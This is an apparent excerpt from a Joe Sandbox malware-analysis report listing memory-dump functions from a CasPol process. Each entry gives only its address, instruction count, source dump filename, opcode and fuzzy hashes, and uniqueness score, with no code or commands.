                                                                                                                                    • Instruction ID: 4b6be099611c45c466d6bad785bf747c5d3066f16429b29b6cd36f8c4ebb0347
                                                                                                                                    • Opcode Fuzzy Hash: 2765b41e85c2d2682a9524475cda41ef58753200ae13ac76b0cc5273fa4dc298
                                                                                                                                    • Instruction Fuzzy Hash: 59113C75F002188FCF84EBBCC890A9EBBF6AB8C6507204069D109E7314EE34AD019B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20658080 Relevance: .1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 83829a91c5995aca073e2adfa2d5c7bca9183f011a8541416b6add21fba9fcd0
                                                                                                                                    • Instruction ID: bdb9f2f7183341b021b53b01a754a1aefd491875b4866bc10903a2aeda78a9ee
                                                                                                                                    • Opcode Fuzzy Hash: 83829a91c5995aca073e2adfa2d5c7bca9183f011a8541416b6add21fba9fcd0
                                                                                                                                    • Instruction Fuzzy Hash: 8C115275F002199FCF80EBBCD8505AF7BF6AB8C6507208069D509E7310EF30AE029B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20657F60 Relevance: .1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1a593b41b9d3d48b0c87013142d961b5c5d1cb5007e26b4076c09e74d07fd20c
                                                                                                                                    • Instruction ID: aa17b9aac5f58fbf819883ef192f0120c7f3684e542a81623774431a585697b7
                                                                                                                                    • Opcode Fuzzy Hash: 1a593b41b9d3d48b0c87013142d961b5c5d1cb5007e26b4076c09e74d07fd20c
                                                                                                                                    • Instruction Fuzzy Hash: C3113075F002188FCB80DBBD88405AEBBF6AB8C2107214029D509E7354EE30AD02DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20655F20 Relevance: .1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bd3922d08f14b8912dd08ded0b6da04c6e1851217fc092f29827c7533c2fdd5f
                                                                                                                                    • Instruction ID: 7fbfaa1f6d08606968ac819ed57dadeee210920261d7d8500ee30ad37bf67081
                                                                                                                                    • Opcode Fuzzy Hash: bd3922d08f14b8912dd08ded0b6da04c6e1851217fc092f29827c7533c2fdd5f
                                                                                                                                    • Instruction Fuzzy Hash: C2113C75F002588FCB80EBBD98959AEBBF6AB8C2107208069D109E7354EF34AD05DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC55480 Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 873f934418e5940616739062e3e2b430c25dc28c9bbfc5f379b07f8530252402
                                                                                                                                    • Instruction ID: fc235dd5d83beb94f81cbfc91a3451826985b4aab38a9f2dbe5ac48fdf23e2c0
                                                                                                                                    • Opcode Fuzzy Hash: 873f934418e5940616739062e3e2b430c25dc28c9bbfc5f379b07f8530252402
                                                                                                                                    • Instruction Fuzzy Hash: 34112575E00218CFCB54DFA9C484A9EBFF6EF88364F14852AD504E7310E7309981DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 206550B7 Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1269e18ba1da90c01df44706a7d18e7ccbba2ac23221f5320731bb8c203b2c8f
                                                                                                                                    • Instruction ID: cf326e5e4062bb600426d46a32ae5a473be7a516d0a7ea1d62c3cd563cee2b88
                                                                                                                                    • Opcode Fuzzy Hash: 1269e18ba1da90c01df44706a7d18e7ccbba2ac23221f5320731bb8c203b2c8f
                                                                                                                                    • Instruction Fuzzy Hash: 1601D631B143288FDB509B7988143AE7FF69F85250F0000B9D649D3281EE349E05CB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065FB5F Relevance: .1, Instructions: 52COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bc1dfc2dd9e4e2a1a300569601c61bad777ea660e55246aa6151bb0db084c027
                                                                                                                                    • Instruction ID: 90fb771978fe337127354368a55ad65fc501cab76dc5681f472a812a22821dea
                                                                                                                                    • Opcode Fuzzy Hash: bc1dfc2dd9e4e2a1a300569601c61bad777ea660e55246aa6151bb0db084c027
                                                                                                                                    • Instruction Fuzzy Hash: C20188397043058FCB41CBB8DC51ADA77F1EF89750B2140B6D508DF361EA359E0A9B61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC506A1 Relevance: .0, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e933b71bc6d8fa15a56e2fa14afee382b4b0bf54ec2746660d25958f0bccce19
                                                                                                                                    • Instruction ID: ddf023e9c11c41b700df0b2a955e815481ef6bd3475d79afa876197475944366
                                                                                                                                    • Opcode Fuzzy Hash: e933b71bc6d8fa15a56e2fa14afee382b4b0bf54ec2746660d25958f0bccce19
                                                                                                                                    • Instruction Fuzzy Hash: AB11C879A14365CFCB00ABB8D88978D3BF29F89351B144567D041CB266EF741807CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC59DBC Relevance: .0, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 08f95c36a4c277f60bf5fa003da54f8c0be93924ff7b85b2ca5009883723b0e2
                                                                                                                                    • Instruction ID: c7460e66475fa4dcf3a63f83b4d65bf8ee1b1a6b34a0f98528b401bc0c74ad1f
                                                                                                                                    • Opcode Fuzzy Hash: 08f95c36a4c277f60bf5fa003da54f8c0be93924ff7b85b2ca5009883723b0e2
                                                                                                                                    • Instruction Fuzzy Hash: 4801D471F093998FCF02DBB888842DEBFF0DF49250B1502AAC009E3252E6345E06CBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53A14 Relevance: .0, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ea09ee4e977240155c23b01169e13488c358d2305f88c44a42d24e8ec17d185f
                                                                                                                                    • Instruction ID: 345cf6be6afdf0e652b95d0a94fcfc27d1557066af42445fbcbbc3d643821e85
                                                                                                                                    • Opcode Fuzzy Hash: ea09ee4e977240155c23b01169e13488c358d2305f88c44a42d24e8ec17d185f
                                                                                                                                    • Instruction Fuzzy Hash: C3117275A102299FDB61DB68D844AADBBFABF49310F1081DAD898A7310DB319E90DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065DF10 Relevance: .0, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f911bf97875da06764ea1d66e648921473986d06f71f86febb4fd91a121df2e8
                                                                                                                                    • Instruction ID: 87d86c0074adb7f13f2add79646dba1368559d55fc871fadd5bab82e048d897f
                                                                                                                                    • Opcode Fuzzy Hash: f911bf97875da06764ea1d66e648921473986d06f71f86febb4fd91a121df2e8
                                                                                                                                    • Instruction Fuzzy Hash: 60F01D71F002288F8FA4EBBD44552AE7EF5AF89650B15013AD90AE7240EE344E01CBDA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20653C59 Relevance: .0, Instructions: 40COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 68580b061a8d9a629110e2433fc0fa64843f4e68e503109a9f63d6871aa9e012
                                                                                                                                    • Instruction ID: a9217e7c9f3d9fa92a8ec24399f079b3ecdf178a37f77aae1f5007e26395fdcc
                                                                                                                                    • Opcode Fuzzy Hash: 68580b061a8d9a629110e2433fc0fa64843f4e68e503109a9f63d6871aa9e012
                                                                                                                                    • Instruction Fuzzy Hash: 61F0C232E002685BCB55DB7EC8542DEBBF5AF88210F15807AD906E7241ED325D09C7D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065DB04 Relevance: .0, Instructions: 39COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6619ac816aee701726ea1d328453c6da500bb10393a2b3ac36a24dc2e7566689
                                                                                                                                    • Instruction ID: 1048fd2f305b6e89b94f1a2006d311427f1f3149dbd5da040d03eb2e5e346adf
                                                                                                                                    • Opcode Fuzzy Hash: 6619ac816aee701726ea1d328453c6da500bb10393a2b3ac36a24dc2e7566689
                                                                                                                                    • Instruction Fuzzy Hash: DDF0B4B1B102289BCB5096BD98543AE7FA6DBC9660F150035D905D3380EE345906C3E6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC59DD8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4163c9f7315c080ce18335a715e933771e92a1d2bb369aaf2fcc343d60bce7ce
                                                                                                                                    • Instruction ID: ee4cb763947effc343f24c98a12eff74bf0747c83a696dc1800e308fd29fdf17
                                                                                                                                    • Opcode Fuzzy Hash: 4163c9f7315c080ce18335a715e933771e92a1d2bb369aaf2fcc343d60bce7ce
                                                                                                                                    • Instruction Fuzzy Hash: 86F01D71F002299FCF40EFB988446AEBFF5EB88255B144575D509E3300EA3469058BE5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53A6B Relevance: .0, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7f553f3f91ff0b74e0f3b466803ed8343cbaadfee529656d59e7cd25d99701f3
                                                                                                                                    • Instruction ID: f72ef93652d48e226e2998406e67c35ebf786fe7a3e2664b6b3f0efbdf27395a
                                                                                                                                    • Opcode Fuzzy Hash: 7f553f3f91ff0b74e0f3b466803ed8343cbaadfee529656d59e7cd25d99701f3
                                                                                                                                    • Instruction Fuzzy Hash: 9B019575E112299FDBA1DF68D8446D8BBF5BF49310F1081DA9898A7310DA319F90DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC51C9C Relevance: .0, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3c643d737c9a26ebc017ee7539e7ab40a450fbdc6aaaec8690f995a7633a0a88
                                                                                                                                    • Instruction ID: 20fd292b1816d66848dc61927b7dd1edfcc679c6751f80126158ad59695525ba
                                                                                                                                    • Opcode Fuzzy Hash: 3c643d737c9a26ebc017ee7539e7ab40a450fbdc6aaaec8690f995a7633a0a88
                                                                                                                                    • Instruction Fuzzy Hash: 7DF0DA35F10224CBDB18ABB9985835D77B1BB88751F204529E906D7380DF359801CB44
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC553B8 Relevance: .0, Instructions: 29COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 380c8fb27f95033cbad1846a86e6cafebcae02f86741882d4293c60972da8ef9
                                                                                                                                    • Instruction ID: 773c8ec3e6650bde4d6334a2270dec0bfb048221d6d5b1ec2a5c0d90791243f6
                                                                                                                                    • Opcode Fuzzy Hash: 380c8fb27f95033cbad1846a86e6cafebcae02f86741882d4293c60972da8ef9
                                                                                                                                    • Instruction Fuzzy Hash: E6E06572E102199F8B50DFBD9C445AFBFF8EB8C250B144536E909E3200E73049018BE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53AC2 Relevance: .0, Instructions: 27COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 641f388b6092eec0d4a975012ec947cd391180d8964a8eab2ff2a7c93b4dd4d0
                                                                                                                                    • Instruction ID: 871e834756989f99cdb44709c4da9b73269c91a582c96c6037f927bb86d4f2a8
                                                                                                                                    • Opcode Fuzzy Hash: 641f388b6092eec0d4a975012ec947cd391180d8964a8eab2ff2a7c93b4dd4d0
                                                                                                                                    • Instruction Fuzzy Hash: F6F0A435E012289FDBA1DFA8D8846DCF7F5BB88715F1085E6D498A7210DA319F908F12
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC56109 Relevance: .0, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8bd948928f462eb9b93246e4ece7b6d8dc8a2ba95807b998a3cd056878647c9f
                                                                                                                                    • Instruction ID: cefafdd3ef9d7eef0fc1d7359a7713c11809c7ebcd277e4507417017af44890b
                                                                                                                                    • Opcode Fuzzy Hash: 8bd948928f462eb9b93246e4ece7b6d8dc8a2ba95807b998a3cd056878647c9f
                                                                                                                                    • Instruction Fuzzy Hash: 0AE0393AB002148BCF00EBB8D8884ECB3F6BB886657108465E809E7355DE319E01DB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20655E5F Relevance: .0, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da0cc5e95910a4191d936f9f4c549374196a8f5412fc1709e9eb3beba5a9b467
                                                                                                                                    • Instruction ID: 7d645b62d74a019db38b6587a5a572776c4709a53df2d819e8ee00716f1701df
                                                                                                                                    • Opcode Fuzzy Hash: da0cc5e95910a4191d936f9f4c549374196a8f5412fc1709e9eb3beba5a9b467
                                                                                                                                    • Instruction Fuzzy Hash: 31E0ED35F002148BCF40EBF8D8569DDB7F1AF88215720846AD509E7361DE31AE05A791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065FAFF Relevance: .0, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 71182de2d5bb76d0e3c1ff7bde7364a9c2ffce53adb13e22ed2d6dfbc3fbf386
                                                                                                                                    • Instruction ID: 7cb5b60dfc86c1ca319f852830046c4eded0d3b1545d546235cfce683c857328
                                                                                                                                    • Opcode Fuzzy Hash: 71182de2d5bb76d0e3c1ff7bde7364a9c2ffce53adb13e22ed2d6dfbc3fbf386
                                                                                                                                    • Instruction Fuzzy Hash: ADE0ED35F001148BCF44EBF8D4959DDB7F1AF88154720446AD109E7225EE35AE05AB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 206580DF Relevance: .0, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9d4afd2cff62ebc48bbc86197a660ac68add07d05eea45d1e870319fb60cb2cf
                                                                                                                                    • Instruction ID: 21c4a2f9964afd763612871bbf2f9d49f2452d1580ff53d2e89ec8e4b38d084e
                                                                                                                                    • Opcode Fuzzy Hash: 9d4afd2cff62ebc48bbc86197a660ac68add07d05eea45d1e870319fb60cb2cf
                                                                                                                                    • Instruction Fuzzy Hash: 06E0ED39F001158BCF40EBF8E8559DDB7F2AF88255720886AD109E7221DF31AE06AB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20655F7F Relevance: .0, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6ee800acb97d9ce9dac1acb4d7e6fcfae8a3b343279e59f43e01a054287b61bb
                                                                                                                                    • Instruction ID: 36a8224eb9c52029ea677c8bf44ad68c101949723fba7d8210f6344e6b5dabd0
                                                                                                                                    • Opcode Fuzzy Hash: 6ee800acb97d9ce9dac1acb4d7e6fcfae8a3b343279e59f43e01a054287b61bb
                                                                                                                                    • Instruction Fuzzy Hash: 95E0ED39F002548BCF44EBF8E4559DDB7F1AF88214720886AD109E7265DF35AE05AB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8A23F4 Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416547938.000000001D8A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8A2000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8a2000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fed4d259773a86ea7940f1a9a41bf720dfd667db4f48942e086d66ebfa83e8b2
                                                                                                                                    • Instruction ID: a373c36638efad2e47db7044ded316eb84159b85ae8ca0485b5b8b18f9d901ae
                                                                                                                                    • Opcode Fuzzy Hash: fed4d259773a86ea7940f1a9a41bf720dfd667db4f48942e086d66ebfa83e8b2
                                                                                                                                    • Instruction Fuzzy Hash: 1CD05E796056D24FD312CE28D5A0FA93BA4BF92704F4244FAA8408B673C368E581D202
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8A23BC Relevance: .0, Instructions: 14COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416547938.000000001D8A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8A2000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8a2000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da8e0a98e1470a28aa25c50854363cc96e77005020392da06e1f8b0418855f12
                                                                                                                                    • Instruction ID: 31c41c50c27a1f2b26813bf6700c6f550a70401249e3a7615b2e84c1d95d6e75
                                                                                                                                    • Opcode Fuzzy Hash: da8e0a98e1470a28aa25c50854363cc96e77005020392da06e1f8b0418855f12
                                                                                                                                    • Instruction Fuzzy Hash: 1ED05E347002814FDB21CE1CD1D0F6977E4AF85B00F1244E9BC018F272C3B8E880E601
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC50070 Relevance: .0, Instructions: 10COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 59521772c3e926380824fbb27b6c6e532079bad2f87687bfe218895989d5f9e9
                                                                                                                                    • Instruction ID: ee82cb9629207cf18edccfade99cff71334ba2175a7c2142a88b563e62e2e135
                                                                                                                                    • Opcode Fuzzy Hash: 59521772c3e926380824fbb27b6c6e532079bad2f87687bfe218895989d5f9e9
                                                                                                                                    • Instruction Fuzzy Hash: 51C02B300152AD8BD71437B8DA4F23C3B7CAF48389B000030E406495D3CD113D00C931
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%